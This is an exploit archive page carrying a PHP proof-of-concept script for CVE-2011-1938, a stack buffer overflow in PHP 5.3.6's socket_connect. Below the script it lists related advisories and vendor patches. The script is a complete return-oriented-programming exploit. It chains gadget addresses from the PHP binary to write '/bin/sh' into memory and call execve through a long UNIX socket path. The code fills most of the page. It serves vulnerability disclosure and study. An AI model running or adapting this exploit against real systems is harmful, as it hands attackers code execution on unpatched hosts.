Lucene search
Jonathan SalwanPACKETSTORM:102751HistoryJul 03, 2011 - 12:00 a.m.
PHP 5.3.6 Buffer Overflow
2011-07-0300:00:00
Jonathan Salwan
packetstormsecurity.com
61
0.019 Low
EPSS
Percentile
87.0%
`<?php
/*
** Jonathan Salwan - @shell_storm
** http://shell-storm.org
** 2011-06-04
**
** http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1938
**
** Stack-based buffer overflow in the socket_connect function in ext/sockets/sockets.c
** in PHP 5.3.3 through 5.3.6 might allow context-dependent attackers to execute arbitrary
** code via a long pathname for a UNIX socket.
*/
echo "[+] PHP 5.3.6 Buffer Overflow PoC (ROP)\n";
echo "[+] CVE-2011-1938\n\n";
# Gadgets in /usr/bin/php
define('DUMMY', "\x42\x42\x42\x42"); // padding
define('STACK', "\x20\xba\x74\x08"); // .data 0x46a0 0x874ba20
define('STACK4', "\x24\xba\x74\x08"); // STACK + 4
define('STACK8', "\x28\xba\x74\x08"); // STACK + 8
define('STACK12', "\x3c\xba\x74\x08"); // STACK + 12
define('INT_80', "\x27\xb6\x07\x08"); // 0x0807b627: int $0x80
define('INC_EAX', "\x66\x50\x0f\x08"); // 0x080f5066: inc %eax | ret
define('XOR_EAX', "\x60\xb4\x09\x08"); // 0x0809b460: xor %eax,%eax | ret
define('MOV_A_D', "\x84\x3e\x12\x08"); // 0x08123e84: mov %eax,(%edx) | ret
define('POP_EBP', "\xc7\x48\x06\x08"); // 0x080648c7: pop %ebp | ret
define('MOV_B_A', "\x18\x45\x06\x08"); // 0x08064518: mov %ebp,%eax | pop %ebx | pop %esi | pop %edi | pop %ebp | ret
define('MOV_DI_DX', "\x20\x26\x07\x08"); // 0x08072620: mov %edi,%edx | pop %esi | pop %edi | pop %ebp | ret
define('POP_EDI', "\x23\x26\x07\x08"); // 0x08072623: pop %edi | pop %ebp | ret
define('POP_EBX', "\x0f\x4d\x21\x08"); // 0x08214d0f: pop %ebx | pop %esi | pop %edi | pop %ebp | ret
define('XOR_ECX', "\xe3\x3b\x1f\x08"); // 0x081f3be3: xor %ecx,%ecx | pop %ebx | mov %ecx,%eax | pop %esi | pop %edi | pop %ebp | ret
$padd = str_repeat("A", 196);
$payload = POP_EDI. // pop %edi
STACK. // 0x874ba20
DUMMY. // pop %ebp
MOV_DI_DX. // mov %edi,%edx
DUMMY. // pop %esi
DUMMY. // pop %edi
"//bi". // pop %ebp
MOV_B_A. // mov %ebp,%eax
DUMMY. // pop %ebx
DUMMY. // pop %esi
DUMMY. // pop %edi
DUMMY. // pop %ebp
MOV_A_D. // mov %eax,(%edx)
POP_EDI. // pop %edi
STACK4. // 0x874ba24
DUMMY. // pop %ebp
MOV_DI_DX. // mov %edi,%edx
DUMMY. // pop %esi
DUMMY. // pop %edi
"n/sh". // pop %ebp
MOV_B_A. // mov %ebp,%eax
DUMMY. // pop %ebx
DUMMY. // pop %esi
DUMMY. // pop %edi
DUMMY. // pop %ebp
MOV_A_D. // mov %eax,(%edx)
POP_EDI. // pop %edi
STACK8. // 0x874ba28
DUMMY. // pop %ebp
MOV_DI_DX. // mov %edi,%edx
DUMMY. // pop %esi
DUMMY. // pop %edi
DUMMY. // pop %ebp
XOR_EAX. // xor %eax,%eax
MOV_A_D. // mov %eax,(%edx)
XOR_ECX. // xor %ecx,%ecx
DUMMY. // pop %ebx
DUMMY. // pop %esi
DUMMY. // pop %edi
DUMMY. // pop %ebp
POP_EBX. // pop %ebx
STACK. // 0x874ba20
DUMMY. // pop %esi
DUMMY. // pop %edi
DUMMY. // pop %ebp
XOR_EAX. // xor %eax,%eax
INC_EAX. // inc %eax
INC_EAX. // inc %eax
INC_EAX. // inc %eax
INC_EAX. // inc %eax
INC_EAX. // inc %eax
INC_EAX. // inc %eax
INC_EAX. // inc %eax
INC_EAX. // inc %eax
INC_EAX. // inc %eax
INC_EAX. // inc %eax
INC_EAX. // inc %eax
INT_80; // int $0x80
$evil = $padd.$payload;
$fd = socket_create(AF_UNIX, SOCK_STREAM, 1);
$ret = socket_connect($fd, $evil);
?>
`
Related
seebug
seebug
PHP 5.3.6 - Buffer Overflow PoC (ROP)
2014-07-01 00:00:00
PHP <= 5.3.5 socket_connect() Buffer Overflow Vulnerability
2011-05-26 00:00:00
PHP 5.3.6 Buffer Overflow PoC (ROP) CVE-2011-1938
2011-07-05 00:00:00
ubuntucve
ubuntucve
CVE-2011-1938
2011-05-31 00:00:00
exploitpack
exploitpack
PHP 5.3.5 - socket_connect() Local Buffer Overflow
2011-05-25 00:00:00
PHP 5.3.6 - Local Buffer Overflow (ROP)
2011-07-04 00:00:00
veracode
veracode
Denial Of Service (DoS)
2020-04-10 01:03:26
packetstorm
packetstorm
PHP Socket connect() Stack Buffer Overflow
2011-05-25 00:00:00
openvas
openvas
PHP 'socket_connect()' Buffer Overflow Vulnerability (Windows)
2011-06-02 00:00:00
FreeBSD Ports: php5, php5-sockets
2011-09-21 00:00:00
Slackware Advisory SSA:2011-237-01 php
2012-09-10 00:00:00
prion
prion
Stack overflow
2011-05-31 20:55:00
cve
cve
CVE-2011-1938
2011-05-31 20:55:00
exploitdb
exploitdb
PHP 5.3.5 - 'socket_connect()' Local Buffer Overflow
2011-05-25 00:00:00
PHP 5.3.6 - Local Buffer Overflow (ROP)
2011-07-04 00:00:00
freebsd
freebsd
php -- multiple vulnerabilities
2011-08-18 00:00:00
nessus
nessus
Slackware 11.0 / 12.0 / 12.1 / 12.2 / 13.0 / 13.1 / 13.37 / current : php (SSA:2011-237-01)
2011-08-26 00:00:00
PHP 5.3 < 5.3.7 Multiple Vulnerabilities
2011-08-23 00:00:00
PHP 5.3.x < 5.3.7 Multiple Vulnerabilities
2011-08-23 00:00:00
securityvulns
securityvulns
[slackware-security] php (SSA:2011-237-01)
2011-08-27 00:00:00
PHP multiple security vulnerabilities
2011-08-27 00:00:00
[ MDVSA-2012:071 ] php
2012-05-14 00:00:00
slackware
slackware
[slackware-security] php
2011-08-25 16:35:35
fedora
fedora
[SECURITY] Fedora 16 Update: php-5.3.8-1.fc16
2011-09-09 17:13:35
[SECURITY] Fedora 15 Update: maniadrive-1.2-32.fc15
2011-09-18 23:00:38
[SECURITY] Fedora 14 Update: php-5.3.8-1.fc14
2011-09-18 22:59:22
debian
debian
[SECURITY] [DSA 2399-2] php5 regression fix
2012-01-31 15:26:47
[SECURITY] [DSA 2399-1] php5 security update
2012-01-31 07:22:58
osv
osv
php5 - several
2012-01-31 00:00:00
amazon
amazon
Important: php
2011-10-11 00:07:00
f5
f5
SOL15903 - Multiple PHP vulnerabilities
2014-12-11 00:00:00
K15903 : Multiple PHP vulnerabilities
2014-12-11 00:00:00
ubuntu
ubuntu
PHP Vulnerabilities
2011-10-18 00:00:00
redhat
redhat
(RHSA-2011:1423) Moderate: php53 and php security update
2011-11-02 00:00:00
centos
centos
php53 security update
2011-11-03 03:59:22
oraclelinux
oraclelinux
php53 and php security update
2011-11-02 00:00:00
php security update
2012-06-29 00:00:00
gentoo
gentoo
PHP: Multiple vulnerabilities
2011-10-10 00:00:00